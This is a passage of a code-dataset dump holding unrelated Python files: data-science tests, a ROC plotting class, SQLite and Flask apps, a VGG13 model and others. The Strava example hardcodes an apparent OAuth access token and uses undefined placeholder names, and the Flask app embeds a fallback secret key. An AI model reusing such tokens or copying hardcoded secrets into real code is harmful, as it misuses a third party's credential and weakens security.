min_df=20, stop_words='english' )\n\t\tC = vectorizer.fit_transform( news[ 'data' ] ).toarray().T\n\t\tV = vectorizer.get_feature_names()\n\t\tk = 20\n\t\talpha0 = 1.\n\t\tTLDA = TensorDecompositionLDA( k, alpha0 )\n\t\talphas, Phi = TLDA.fit( C )\n\t\tfig, axs = plt.subplots( 7, 3, figsize=( 14, 24 ) )\n\n\t\tfor n in range( k ):\n\t\t\ti, j = divmod( n, 3 )\n\t\t\tax = axs[i, j]\n\t\t\tt = TLDA.topic_words( 100, n )\n\t\t\tfreqs = { V[idx]:p*1000 for ( idx, p ) in t[ f'topic {n}' ] }\n\n\t\t\twith warnings.catch_warnings():\n\t\t\t\t# hide deprecation warnings\n\t\t\t\twarnings.simplefilter( 'ignore' )\n\t\t\t\twc = WordCloud( background_color=\"white\", width=800, height=500 )\n\t\t\t\twc = wc.generate_from_frequencies( freqs )\n\t\t\t\tax.set_title( 'Topic %d' % (n + 1) )\n\t\t\t\tax.imshow( wc, interpolation='bilinear' )\n\t\t\t\tax.axis( 'off' )\n\n\t\taxs[-1, -1].axis( 'off' )\n\t\tplt.show()\n\t\t\nif __name__ == '__main__':\n\tunittest.main()\n","repo_name":"cs0lar/tdlda","sub_path":"tests/test_lda.py","file_name":"test_lda.py","file_ext":"py","file_size_in_byte":7269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"45132983373","text":"import forecaster as w\nimport os\nmyWeather = w.Weather(os.environ['DARK_SKY_KEY'])\n\ndef actuate(info):\n gpsData = info['LOCATION.GPS']\n coordinates = gpsData['current_location']['latlong']\n response = \"\"\n weather = myWeather.current(coordinates)\n if info[\"WeatherKeyword\"] == \"weather\":\n distance = weather[\"nearestStormDistance\"]\n if(distance < 5):\n response += \"Storm nearby. Batten the hatches.\"\n response += \"It is \" + str(weather[\"summary\"]) + \" outside and is \" + str(weather[\"temperature\"]) + \" with a humidity of \" + str(weather[\"humidity\"]) + \" and a wind speed of \" + str(weather[\"windSpeed\"])\n elif info[\"WeatherKeyword\"] == \"humidity\":\n response += \"The humidity is \" + str(weather[\"humidity\"])\n return response\n","repo_name":"huberf/PAL","sub_path":"weather/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"18816398639","text":"from .day23 import part1, part2\n\nINPUT = \"\"\"set b 79\nset c b\njnz a 2\njnz 1 5\nmul b 100\nsub b -100000\nset c b\nsub c -17000\nset f 1\nset d 2\nset e 2\nset g d\nmul g e\nsub g b\njnz g 2\nset f 0\nsub e -1\nset g e\nsub g b\njnz g -8\nsub d -1\nset g d\nsub g b\njnz g -13\njnz f 2\nsub h -1\nset g b\nsub g c\njnz g 2\njnz 1 3\nsub b -17\njnz 1 -23\"\"\".split('\\n')\n\n\ndef test_part1():\n actual = part1(INPUT)\n assert actual == 5929\n\n\ndef test_part2():\n assert part2() == 907\n\n\nif __name__ == '__main__':\n import pytest\n pytest.main()\n","repo_name":"snorrwe/advent-of-code","sub_path":"2017/advent_src/day23/day23_test.py","file_name":"day23_test.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"42844648906","text":"# ============================*\n # ** Copyright UCAR (c) 2020\n # ** University Corporation for Atmospheric Research (UCAR)\n # ** National Center for Atmospheric Research (NCAR)\n # ** Research Applications Lab (RAL)\n # ** P.O.Box 3000, Boulder, Colorado, 80307-3000, USA\n # ============================*\n \n \n \n\"\"\"\nClass Name: ROCDiagramSeries\n \"\"\"\n__author__ = 'Minna Win'\n\nimport warnings\nimport pandas as pd\nimport re\nimport metcalcpy.util.ctc_statistics as cstats\nimport metcalcpy.util.pstd_statistics as pstats\nimport metcalcpy.util.utils as utils\nfrom ..series import Series\n\n\nclass ROCDiagramSeries(Series):\n \"\"\"\n Represents a ROC diagram series object\n of data points and their plotting style\n elements (line colors, markers, linestyles, etc.)\n\n \"\"\"\n\n def __init__(self, config, idx, input_data):\n super().__init__(config, idx, input_data)\n\n def _create_series_points(self):\n \"\"\"\n Subset the data for the appropriate series. Data input can\n originate from CTC linetype or PCT linetype. The methodology\n will depend on the linetype.\n\n Args:\n\n Returns:\n tuple of three lists:\n pody (Probability of detection) and\n pofd (probability of false detection/\n false alarm rate)\n thresh (threshold value, used to annotate)\n\n\n \"\"\"\n warnings.filterwarnings(\"error\")\n\n # Subset data based on self.all_series_vals that we acquired from the\n # config file\n input_df = self.input_data\n\n # Event equalization can sometimes create an empty data frame. Check for\n # an empty data frame and return a tuple of empty lists if this is the case.\n if input_df.empty:\n print(f\"INFO: No points to plot (most likely as a result of event equalization). \")\n return [],[],[]\n\n series_num = self.series_order\n perm = utils.create_permutations(self.all_series_vals)\n if len(self.all_series_vals) > 0:\n cur_perm = perm[series_num]\n subset_df = self._subset_data(input_df, cur_perm)\n else:\n # no subsetting of data required, no series_val_1 values\n # were specified in the config file.\n subset_df = input_df.copy()\n if self.config.linetype_ctc:\n subset_df = self._add_ctc_columns(subset_df)\n df_roc = cstats.calculate_ctc_roc(subset_df, ascending=self.config.ctc_ascending)\n pody = df_roc['pody']\n pody = pd.concat([pd.Series([1]), pody], ignore_index=True)\n pody = pd.concat([pody, pd.Series([0])], ignore_index=True)\n pofd = df_roc['pofd']\n pofd = pd.concat([pd.Series([1]), pofd], ignore_index=True)\n pofd = pd.concat([pofd, pd.Series([0])], ignore_index=True)\n thresh = df_roc['thresh']\n thresh = pd.concat([pd.Series(['']), thresh], ignore_index=True)\n thresh = pd.concat([thresh, pd.Series([''])], ignore_index=True)\n return pofd, pody, thresh\n\n elif self.config.linetype_pct:\n roc_df = pstats._calc_pct_roc(subset_df)\n pody = roc_df['pody']\n pody = pd.concat([pd.Series([1]), pody], ignore_index=True)\n pody = pd.concat([pody, pd.Series([0])])\n pofd = roc_df['pofd']\n pofd = pd.concat([pd.Series([1]), pofd], ignore_index=True)\n pofd = pd.concat([pofd, pd.Series([0])], ignore_index=True)\n thresh = roc_df['thresh']\n thresh = pd.concat([pd.Series(['']),thresh], ignore_index=True)\n thresh = pd.concat([thresh, pd.Series([''])], ignore_index=True)\n return pofd, pody, thresh\n else:\n raise ValueError('error neither ctc or pct linetype ')\n\n def _subset_data(self, df_full, permutation):\n '''\n Subset the input dataframe, iterating over the column and rows of interest\n\n Args:\n @param df_full: The pandas dataframe representation of the full\n input data.\n\n @param permutation: A list representing a permutation/series of\n interest (e.g. ['model', 'vx_mask'],\n which represent the series values of interest\n that are specified in the config file.\n\n Returns:\n df_subset: The portion of the full dataset that corresponds to the column header(s)\n and rows of interest.\n '''\n\n df_subset = df_full.copy()\n\n # only supporting series_val_1 for ROC diagrams, so we are\n # only interested in the series_inner_dict1\n inner_dict = self.config.series_inner_dict1\n\n for perm in permutation:\n for k, v in self.config.series_inner_dict1.items():\n if perm == k:\n column_header = v\n row_of_interest = perm\n\n df_subset = df_subset[df_subset[column_header] == row_of_interest]\n\n return df_subset\n\n def _add_ctc_columns(self, df_input):\n '''\n Create two new columns in the data frame from the fcst_thresh\n column of the CTC linetype data. This will be useful in sorting\n based on the fcst_thresh values.\n\n Args:\n @param df_input: the dataframe containing all the CTC data\n\n Returns:\n @param thresh_sorted: a new dataframe that is sorted based on\n the threshold value and threshold operator\n that comprise the fcst_thresh column.\n If two or more threshold values are identical,\n use the threshold operator (<,<=,==, >=,>)\n to determine the order.\n '''\n\n # If the df_input dataframe is empty (most likely as a result of event equalization),\n # return the df_input data frame.\n if df_input.empty:\n return df_input\n\n # From the fcst_thresh column, create two new columns, thresh_values and\n # op_wts that we can then sort using Pandas' multi-column sorting\n # capability.\n operators = []\n values = []\n thresholds = df_input['fcst_thresh']\n # Assign weights to the operators, 1 for the <, 5 for the > so that\n # > supercedes all other operators.\n wt_maps = {'<': 1, '<=': 2, '==': 3, '>=': 4, '>': 5}\n wts = []\n for thrsh in thresholds:\n # treat the fcst_thresh as two groups, one for\n # the operator and the other for the value (which\n # can be a negative value).\n match = re.match(r'(\\<|\\<=|\\==|\\>=|\\>)*((-)*([0-9])(.)*)', thrsh)\n match_text = re.match(r'(\\<|\\<=|\\==|\\>=|\\>)*(.*)', thrsh)\n if match:\n operators.append(match.group(1))\n value = float(match.group(2))\n values.append(value)\n elif match_text:\n operators.append(match_text.group(1))\n value = match_text.group(2)\n values.append(value)\n else:\n raise ValueError(\"fcst_thresh has a value that doesn't conform to \"\n \"the expected format\")\n\n for operator in operators:\n # if no operator precedes the number in fcst_thresh,\n # then assume this is the same as == and assign a weight of 3\n if operator is None:\n wts.append(3)\n else:\n wts.append(wt_maps[operator])\n\n # Add these columns to the input dataframe\n df_input['thresh_values'] = values\n df_input['op_wts'] = wts\n\n # return the input dataframe with two additional columns if\n # everything worked as expected\n return df_input\n","repo_name":"dtcenter/METplotpy","sub_path":"metplotpy/plots/roc_diagram/roc_diagram_series.py","file_name":"roc_diagram_series.py","file_ext":"py","file_size_in_byte":8072,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"77"} +{"seq_id":"5993254785","text":"\"\"\"DB functions module\"\"\"\n\nimport sqlite3\nimport streamlit as st\nfrom sqlite3 import Error\n\n\ndef create_connection():\n conn = None\n try:\n # create a memory database for testing\n conn = sqlite3.connect('twitter_likes.db')\n st.success(\n f'successful connection with sqlite version {sqlite3.version}')\n except Error as e:\n st.error(e, icon=\"🚨\")\n if conn:\n return conn\n else:\n return None\n\n\ndef create_users_table():\n conn = sqlite3.connect('twitter_likes.db')\n c = conn.cursor()\n\n c.execute('''\n CREATE TABLE IF NOT EXISTS users (\n id TEXT PRIMARY KEY,\n name TEXT,\n username TEXT\n )\n ''')\n\n conn.commit()\n conn.close()\n\n\ndef insert_users(conn, users):\n cur = conn.cursor()\n for user in users:\n cur.execute(\"INSERT OR IGNORE INTO users(id, name, username) VALUES(?, ?, ?)\",\n (user['id'], user['name'], user['username']))\n conn.commit()\n\n\ndef get_random_user():\n conn = sqlite3.connect('twitter_likes.db')\n c = conn.cursor()\n\n c.execute('SELECT * FROM users ORDER BY RANDOM() LIMIT 1')\n user = c.fetchone()\n\n conn.close()\n\n if user is None:\n return None\n else:\n return {'id': user[0], 'name': user[1], 'username': user[2]}\n","repo_name":"tonykipkemboi/lex-tweet-likes-randomizer","sub_path":"utils/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"22806220163","text":"import json\nimport matplotlib.pyplot as plt\nfrom mplsoccer import Pitch\nimport numpy as np\nfrom scipy.ndimage import gaussian_filter\n\ndef get_heatmap(file, output, team, numeromaillot):\n data=[]\n numeromaillot=int(numeromaillot)\n with open('Data/' + file + '_SecondSpectrum_tracking-produced.jsonl','r') as f:\n for line in f:\n data.append(json.loads(line))\n with open('Data/'+ file + '_SecondSpectrum_meta.json','r') as t:\n datamatch=json.load(t)\n longueurTerrain=datamatch['pitchLength']\n largeurTerrain=datamatch['pitchWidth']\n nbFrames=len(data)\n playerpositionx=[]\n playerpositiony=[]\n label=''\n for j in range(0,nbFrames): \n if team==\"1\":\n for i in range(0,len(datamatch['homePlayers'])):\n if datamatch['homePlayers'][i]['number']==numeromaillot:\n label=datamatch['homePlayers'][i]['name']\n for i in range (0,len(data[j]['homePlayers'])):\n if data[j]['homePlayers'][i]['number']==numeromaillot:\n if data[j][\"period\"]==1:\n playerpositionx.append(data[j]['homePlayers'][i]['xyz'][0])\n playerpositiony.append(data[j]['homePlayers'][i]['xyz'][1])\n else: \n playerpositionx.append(-data[j]['homePlayers'][i]['xyz'][0])\n playerpositiony.append(-data[j]['homePlayers'][i]['xyz'][1])\n elif team==\"2\":\n for i in range(0,len(datamatch['awayPlayers'])):\n if datamatch['awayPlayers'][i]['number']==numeromaillot:\n label=datamatch['awayPlayers'][i]['name']\n for i in range (0,len(data[j]['awayPlayers'])):\n if data[j]['awayPlayers'][i]['number']==numeromaillot:\n if data[j][\"period\"]==1:\n playerpositionx.append(data[j]['awayPlayers'][i]['xyz'][0])\n playerpositiony.append(data[j]['awayPlayers'][i]['xyz'][1])\n else: \n playerpositionx.append(-data[j]['awayPlayers'][i]['xyz'][0])\n playerpositiony.append(-data[j]['awayPlayers'][i]['xyz'][1])\n\n pitch = Pitch(pitch_type='secondspectrum', line_zorder=2,\n pitch_length=longueurTerrain, pitch_width=largeurTerrain,\n pitch_color='#22312b', line_color='#efefef')\n # draw\n fig, ax = pitch.draw(figsize=(6.6, 4.125))\n fig.set_facecolor('white')\n bin_statistic = pitch.bin_statistic(np.array(playerpositionx),np.array(playerpositiony), statistic='count', bins=(25, 25))\n bin_statistic['statistic'] = gaussian_filter(bin_statistic['statistic'], 1)\n pcm = pitch.heatmap(bin_statistic, ax=ax, cmap='hot', edgecolors='#22312b')\n # Add the colorbar and format off-white\n cbar = fig.colorbar(pcm, ax=ax, shrink=0.6)\n cbar.outline.set_edgecolor('#efefef')\n cbar.ax.yaxis.set_tick_params(color='#efefef')\n ticks = plt.setp(plt.getp(cbar.ax.axes, 'yticklabels'), color='black')\n fig.suptitle(\"Heatmap of \"+label, x=0.5,fontsize=20)\n\n plt.savefig(output)\n plt.close()\n\n return output\n\n","repo_name":"tollim311/bayernDeMonique","sub_path":"heatmap.py","file_name":"heatmap.py","file_ext":"py","file_size_in_byte":3163,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"15553611562","text":"\nimport datetime\n\n# Configure OAuth2 access token for authorization: strava_oauth\nswagger_client.configuration.access_token = '4fedf5b7f13c26db633f44d16ed972e05eca3c9b'\n\n# create an instance of the API class\napi_instance = swagger_client.ActivitiesApi()\nname = name_example # String | The name of the activity.\ntype = type_example # String | Type of activity. For example - Run, Ride etc.\nstartDateLocal =cur\nelapsedTime = 56 # Integer | In seconds.\ndescription = description_example # String | Description of the activity. (optional)\ndistance = 3.4 # Float | In meters. (optional)\ntrainer = 56 # Integer | Set to 1 to mark as a trainer activity. (optional)\ncommute = 56 # Integer | Set to 1 to mark as commute. (optional)\n\ntry: \n # Create an Activity\n api_response = api_instance.createActivity(name, type, startDateLocal, elapsedTime, description=description, distance=distance, trainer=trainer, commute=commute)\n pprint(api_response)\nexcept ApiException as e:\n print(\"Exception when calling ActivitiesApi->createActivity: %s\\n\" % e)\n","repo_name":"on1659/coin_autoTradingBot","sub_path":"coin/example/stravaExample.py","file_name":"stravaExample.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"74802177529","text":"import torch\nimport torch.utils.model_zoo as model_zoo\nimport torch.nn as nn\nfrom cnn_basic import ContConv2d\nimport math\n\n# pad all image to size 224\nclass MYVGG13(nn.Module):\n\n legend = [64, 64, 'M', 128, 128, 'M', 256, 256, 'M', 512, 512, 'M', 512, 512, 'M']\n\n model_urls = {\n 'vgg11': 'https://download.pytorch.org/models/vgg11-bbd30ac9.pth',\n 'vgg13': 'https://download.pytorch.org/models/vgg13-c768596a.pth',\n 'vgg16': 'https://download.pytorch.org/models/vgg16-397923af.pth',\n 'vgg19': 'https://download.pytorch.org/models/vgg19-dcbb9e9d.pth',\n 'vgg11_bn': 'https://download.pytorch.org/models/vgg11_bn-6002323d.pth',\n 'vgg13_bn': 'https://download.pytorch.org/models/vgg13_bn-abd245e5.pth',\n 'vgg16_bn': 'https://download.pytorch.org/models/vgg16_bn-6c64b313.pth',\n 'vgg19_bn': 'https://download.pytorch.org/models/vgg19_bn-c79401a0.pth',\n }\n\n dataset_identifier = {\n 'MNIST': 0,\n 'CIFAR10': 1\n }\n\n # pre-trained option allows us to use parameters from the imagenet\n def __init__(self, dataset, pretrained = False, num_classes = 1000, batch_norm = True):\n super(MYVGG13, self).__init__()\n self.pretrained = pretrained\n self.num_classes = num_classes\n self.batch_norm = batch_norm\n\n self.features = self.make_layers()\n self.classifiers = self.make_classifier(dataset)\n\n if pretrained:\n if batch_norm:\n self.load_state_dict(model_zoo.load_url(self.model_urls['vgg13_bn']))\n else:\n self.load_state_dict(model_zoo.load_url(self.model_urls['vgg13']))\n\n def make_layers(self):\n layers = []\n in_channels = 3\n for v in self.legend:\n if v == 'M':\n layers += [nn.MaxPool2d(kernel_size=2, stride=2)]\n else:\n conv2d = ContConv2d(in_channels, v, kernel_size=3, padding=1)\n if self.batch_norm:\n layers += [conv2d, nn.BatchNorm2d(v), nn.ReLU(inplace=True)]\n else:\n layers += [conv2d, nn.ReLU(inplace=True)]\n in_channels = v\n return nn.Sequential(*layers)\n\n def make_classifier(self, dataset):\n if dataset == 'CIFAR10':\n return nn.Sequential(\n nn.Linear(512 * 1 * 1, 4096),\n nn.ReLU(True),\n nn.Dropout(),\n nn.Linear(4096, 4096),\n nn.ReLU(True),\n nn.Dropout(),\n nn.Linear(4096, self.num_classes),\n )\n else:\n return nn.Sequential(\n nn.Linear(512 * 7 * 7, 4096),\n nn.ReLU(True),\n nn.Dropout(),\n nn.Linear(4096, 4096),\n nn.ReLU(True),\n nn.Dropout(),\n nn.Linear(4096, self.num_classes),\n )\n\n def forward(self, x):\n x = self.features(x)\n x = x.view(x.size(0), -1)\n x = self.classifiers(x)\n return x\n\n def _initialize_weights(self):\n for m in self.modules():\n if isinstance(m, ContConv2d):\n n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n m.weight.data.normal_(0, math.sqrt(2. / n))\n if m.bias is not None:\n m.bias.data.zero_()\n elif isinstance(m, nn.BatchNorm2d):\n m.weight.data.fill_(1)\n m.bias.data.zero_()\n elif isinstance(m, nn.Linear):\n n = m.weight.size(1)\n m.weight.data.normal_(0, 0.01)\n m.bias.data.zero_()\n\n def load_state_dict(self, state_dict):\n\n own_state = self.state_dict()\n for name, param in state_dict.items():\n # only copy the filters in convolutional layers\n if name.lower().startswith('classifier'):\n continue\n if name not in own_state:\n raise KeyError('unexpected key \"{}\" in state_dict'.format(name))\n if isinstance(param, nn.Parameter):\n # backwards compatibility for serialized parameters\n param = param.data\n try:\n own_state[name].copy_(param)\n except:\n print('While copying the parameter named {}, whose dimensions in the model are'\n ' {} and whose dimensions in the checkpoint are {}, ...'.format(\n name, own_state[name].size(), param.size()))\n raise\n # for stationary model structure, there shouldn't be missing states\n # for controlled modules, we should expect classifiers to be missing\n # missing = set(own_state.keys()) - set(state_dict.keys())\n # if len(missing) > 0:\n # raise KeyError('missing keys in state_dict: \"{}\"'.format(missing))\n\n # DON'T DO IT HERE!!!!!!!!!!!!!!!!!!!\n # for module in self.modules():\n # if isinstance(module, ContConv2d):\n # module.add_controller()\n\n\n def add_controller(self):\n cont_params = []\n for module in self.modules():\n if isinstance(module, nn.Conv2d):\n for name, param in module.named_parameters():\n if name == 'weight':\n param.require_grad = False\n cont_param = nn.Parameter(torch.randn(param.size()[0], param.size()[0]))\n comb_param = cont_param.mm(param.view(param.size()[0], -1)).view(*param.size())\n module._parameters['weight'] = comb_param\n cont_params.append(cont_param)\n return cont_params\n\n def load(self, path):\n checkpoint = torch.load(path)\n self.load_state_dict(checkpoint['state_dict'])\n\n def save(self, best_path):\n torch.save({'state_dict': best_path}, './model_params/param.pth.tar')\n\n","repo_name":"HarveyYan/ReproDANs","sub_path":"VGG13.py","file_name":"VGG13.py","file_ext":"py","file_size_in_byte":5930,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"2151442563","text":"import math\nimport hashlib\nfrom pyspark import *\nfrom operator import add\nimport os\n\nfrom extensions import Extensions\nfrom logger import Logger\n\nMAX_UNIQUE_CATEGORICAL_FEATURES = long(10 ** 4)\n\nclass MixedData():\n\t\n\tdef __init__(self, sc, dataPath, headerFilePath):\n\t\t\n\t\tself.sc = sc\n\t\tself.uniqueCategoricals = MAX_UNIQUE_CATEGORICAL_FEATURES\n\t\t\n\t\t#initilize information about features\n\t\tself.featureNames = open(headerFilePath, \"r\").read().split(\"\\t\")\n\t\tself.integerColumns = [col for col in range(len(self.featureNames)) if self.featureNames[col][0] == 'I']\n\t\tself.categoricalColumns = [col for col in range(len(self.featureNames)) if self.featureNames[col][0] == 'C']\n\t\tself.labelColumns = [col for col in range(len(self.featureNames)) if self.featureNames[col][0] == \"L\"]\n\t\tself.allColumns = range(len(self.featureNames))\n\t\t\n\t\tif os.path.isdir(dataPath):\n\t\t\t#data is folder of object files, assume preprocessed\n\t\t\tLogger.info('Loading from pickle file at \\'' + dataPath + '\\'...')\n\t\t\tself.rdd = sc.pickleFile(dataPath)\n\t\t\tself.preprocessed = True\n\t\t\tLogger.info('Complete.')\n\t\telse:\n\t\t\t#data is raw text file, needs to be parsed\n\t\t\tLogger.info('Parsing text file at \\'' + dataPath + '\\'...')\n\t\t\tself.rdd = sc.textFile(dataPath).map(lambda line: line.split(\"\\t\"))\n\t\t\t\n\t\t\t#convert the empty entries to None\n\t\t\tself.mapOnColumns(lambda value: None if value == '' else value, self.allColumns)\n\t\t\n\t\t\t#count the number of None entries in each column (used for integer preprocessing)\n\t\t\tself.noneCount = self.accumulateOnColumns(lambda value: 1 if value == None else 0, self.allColumns)\n\n\t\t\t#cast the integer features to integers\n\t\t\tself.mapOnColumns(lambda value: int(value) if value != None else None, self.integerColumns)\n\t\t\tLogger.info('Complete.')\n\t\t\t\n\t\t\tself.preprocessed = False\n\t\t\t\n\tdef mapOnColumns(self, function, columns):\n\t\t\n\t\tdef f(row):\n\t\t\tfor col in columns:\n\t\t\t\trow[col] = function(row[col])\n\t\t\treturn row\n\t\t\n\t\tself.rdd = self.rdd.map(f)\n\t\n\tdef mapOnColumnsWithParam(self, function, array, columns):\n\t\t\n\t\tdef f(row):\n\t\t\tfor col in columns:\n\t\t\t\trow[col] = function(row[col], array[col])\n\t\t\treturn row\n\t\t\n\t\tself.rdd = self.rdd.map(f)\n\t\t\n\tdef accumulateOnColumns(self, function, columns):\n\t\t\n\t\tlength = len(self.featureNames)\n\t\taccumulator = self.sc.accumulator([0] * length, Extensions.ListAccumulatorParam())\n\n\t\tdef f(row):\n\t\t\tincrement = [0] * length\n\t\t\tfor col in columns:\n\t\t\t\tincrement[col] = function(row[col])\n\t\t\taccumulator.add(increment)\n\t\t\t\n\t\tself.rdd.foreach(f)\n\t\t\n\t\treturn accumulator.value\n\t\t\n\tdef normaliseInts(self):\n\n\t\t#calculate sum of each int feature\n\t\tsum = self.accumulateOnColumns(lambda value: value, self.integerColumns)\n\t\t\n\t\t#calculate mean of each int feature\n\t\tcount = self.rdd.count()\n\t\tmeans = [sum[col] / float(count - self.noneCount[col]) for col in self.allColumns]\n\n\t\t#subtract mean from each integer feature\n\t\tself.mapOnColumnsWithParam(lambda value, mean: value - mean if value != None else None, means, self.integerColumns)\n\t\t\n\t\t#calculate sum of squared difference from the mean\n\t\tsquareSum = self.accumulateOnColumns(lambda value: value ** 2 if value != None else None, self.integerColumns)\n\t\t\n\t\t#calculate standard deviation of each int feature\n\t\tstdDevs = [math.sqrt(squareSum[col] / float(count - self.noneCount[col])) for col in self.allColumns]\n\t\t\n\t\t#divide each integer feature by SD\n\t\tself.mapOnColumnsWithParam(lambda value, sd: float(value) / sd if value != None and sd != 0 else value, stdDevs, self.integerColumns)\n\n\tdef hashCategoricalsToInts(self):\n\t\t\t\n\t\tleastCommonCategoricals\t= [[0]] * len(self.allColumns)\n\n\t\tfor col in self.categoricalColumns:\n\t\t\tcolumnHist = self.rdd.map(lambda row: (row[col], 1))\\\n\t\t\t\t.reduceByKey(add)\\\n\t\t\t\t.sortBy(lambda pair: pair[1])\n\t\t\t\n\t\t\tleastCommonCategoricals[col] = columnHist.take(max(0, columnHist.count() - MAX_UNIQUE_CATEGORICAL_FEATURES + 2))\n\t\t\n\t\tnoneHash = MAX_UNIQUE_CATEGORICAL_FEATURES - 1 #reserved hash for missing categorical features\n\t\tinfrequentHash = noneHash - 1 #reserved hash for infrequent categorical values\n\n\t\t#performs the hashing operation on each categorical feature\n\t\tdef hash(value, leastCommonCategoricalsCol):\n\t\t\tif value == None:\n\t\t\t\treturn noneHash\n\t\t\telif value in leastCommonCategoricals:\n\t\t\t\treturn infrequentHash\n\t\t\telse:\n\t\t\t\treturn int(hashlib.sha1(value).hexdigest(), 16) % (MAX_UNIQUE_CATEGORICAL_FEATURES - 2)\n\n\t\tself.mapOnColumnsWithParam(hash, leastCommonCategoricals, self.categoricalColumns)\n\t\t\n\tdef preprocess(self):\n\t\tself.normaliseInts()\n\t\tself.hashCategoricalsToInts()\n\t\tself.preprocessed = True\n\n\t\n\t\t\n\t\n\t","repo_name":"timchap92/SparkFfm","sub_path":"src/mixeddata.py","file_name":"mixeddata.py","file_ext":"py","file_size_in_byte":4550,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"74297392248","text":"from trit import *\n\nclass trigit:\n alphabet = ['n','o','p','q','r','s','t','u','v','w','x','y','z','_',\n 'a','b','c','d','e','f','g','h','i','j','k','l','m']\n\n def __init__(self,s):\n if type(s) == list and len(s) == 3 and all(isinstance(item,trit) for item in s):\n self.list = s\n elif type(s) == int and s >= -13 and s <= 13:\n self.fromInt(s)\n elif type(s) == str:\n if s in trigit.alphabet:\n self.fromChar(s)\n elif len(s) == 3:\n self.list = [trit(c) for c in s]\n else:\n raise TypeError('Invalid constructor input')\n else:\n raise TypeError('Invalid constructor input')\n\n def fromInt(self,n):\n n = n + 13\n self.list = [trit(n//9-1),trit(n//3%3-1),trit(n%3-1)]\n\n def fromChar(self,c):\n n = trigit.alphabet.index(c) - 13\n self.fromInt(n)\n\n def __str__(self,prefix=trinary_prefix):\n return prefix + trigit.alphabet[((self.list[0].d+1) * 9) + ((self.list[1].d+1) * 3) + (self.list[2].d+1)]\n\n def __repr__(self):\n return \"trigit('%s')\" % self.__str__('')\n\n def __eq__(self,other):\n try:\n assert(not isinstance(other,trigit))\n raise TypeError('Invalid arguments for __eq__: trigit and %s' % str(type(other).__name__))\n except AssertionError:\n return all(self.list[i] == other.list[i] for i in range(3))\n\n def __int__(self):\n return ((self.list[0].d) * 9) + ((self.list[1].d) * 3) + (self.list[2].d)\n\n def __add__(self, other):\n try:\n assert(not isinstance(other,trigit))\n raise TypeError('Invalid arguments for __add__: trigit and %s' % str(type(other).__name__))\n except AssertionError:\n out = []\n carry = trit(0)\n for i in range(2,-1,-1):\n add = self.list[i] + other.list[i]\n overflow = self.list[i].overflow(other.list[i])\n out.insert(0,carry + add)\n carry = overflow + carry.overflow(add)\n return trigit(out)\n\n def overflow(self, other):\n out = []\n carry = trit(0)\n for i in range(2,-1,-1):\n add = self.list[i] + other.list[i]\n overflow = self.list[i].overflow(other.list[i])\n out.insert(0,carry + add)\n carry = overflow + carry.overflow(add)\n return trigit([trit(0),trit(0),carry])\n\n def trits(self):\n return ''.join(str(trit) for trit in self.list)\n","repo_name":"cstuartroe/trinary_computer","sub_path":"trigit.py","file_name":"trigit.py","file_ext":"py","file_size_in_byte":2549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"10155136639","text":"\"\"\"Flask app for Cupcakes\"\"\"\nfrom flask import Flask, request, jsonify, render_template, redirect, flash, session\nfrom flask_debugtoolbar import DebugToolbarExtension \nfrom flask_sqlalchemy import SQLAlchemy \nfrom models import db, connect_db, Cupcake\nimport os\n\napp = Flask(__name__) \n\napp.config['SQLALCHEMY_DATABASE_URI'] = 'postgresql:///cupcakes_db'\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False \napp.config['SQLALCHEMY_ECHO'] = True\napp.config['SECRET_KEY'] = os.environ.get(\"SECRET_KEY\", 'bUFEHUWEF900')\napp.config['DEBUG_TB_INTERCEPT_REDIRECTS'] = False \ndebug = DebugToolbarExtension(app)\n\nconnect_db(app) \ndb.create_all() \n\n@app.route('/') \ndef index_page(): \n \"\"\"GET /\n This should return an HTML page (via render_template). \n This page should be entirely static (the route should just render the template, without providing any information on cupcakes in the database).\n It should simply have an empty list where cupcakes should appear and a form where new cupcakes can be added.\n\n Write Javascript (using axios and jQuery) that:\n queries the API to get the cupcakes and adds to the page\n handles form submission to both let the API know about the new cupcake and updates the list on the page to show it\n \"\"\"\n return render_template('index.html') \n \n@app.route('/api/cupcakes')\ndef all_cupcakes():\n \"\"\"GET /api/cupcakes\n Get data about all cupcakes.\n\n Respond with JSON like: {cupcakes: [{id, flavor, size, rating, image}, ...]}.\n\n The values should come from each cupcake instance.\n \"\"\"\n\n all_cupcakes = [cupcake.serialize() for cupcake in Cupcake.query.all()]\n return jsonify(cupcakes=all_cupcakes)\n\n@app.route('/api/cupcakes/')\ndef get_cupcake(id):\n \"\"\"GET /api/cupcakes/[cupcake-id]\n Get data about a single cupcake.\n\n Respond with JSON like: {cupcake: {id, flavor, size, rating, image}}.\n\n This should raise a 404 if the cupcake cannot be found.\n \"\"\"\n cupcake = Cupcake.query.get_or_404(id) \n return jsonify(cupcake=cupcake.serialize())\n\n@app.route('/api/cupcakes', methods=[\"POST\"])\ndef create_cupcake():\n \"\"\"POST /api/cupcakes\n Create a cupcake with flavor, size, rating and image data from the body of the request.\n\n Respond with JSON like: {cupcake: {id, flavor, size, rating, image}}.\n \"\"\"\n # print(request.json)\n new_cupcake = Cupcake(flavor=request.json[\"flavor\"], size=request.json[\"size\"], rating=request.json[\"rating\"], image=request.json[\"image\"])\n db.session.add(new_cupcake)\n db.session.commit()\n response_json = jsonify(cupcake=new_cupcake.serialize())\n return (response_json, 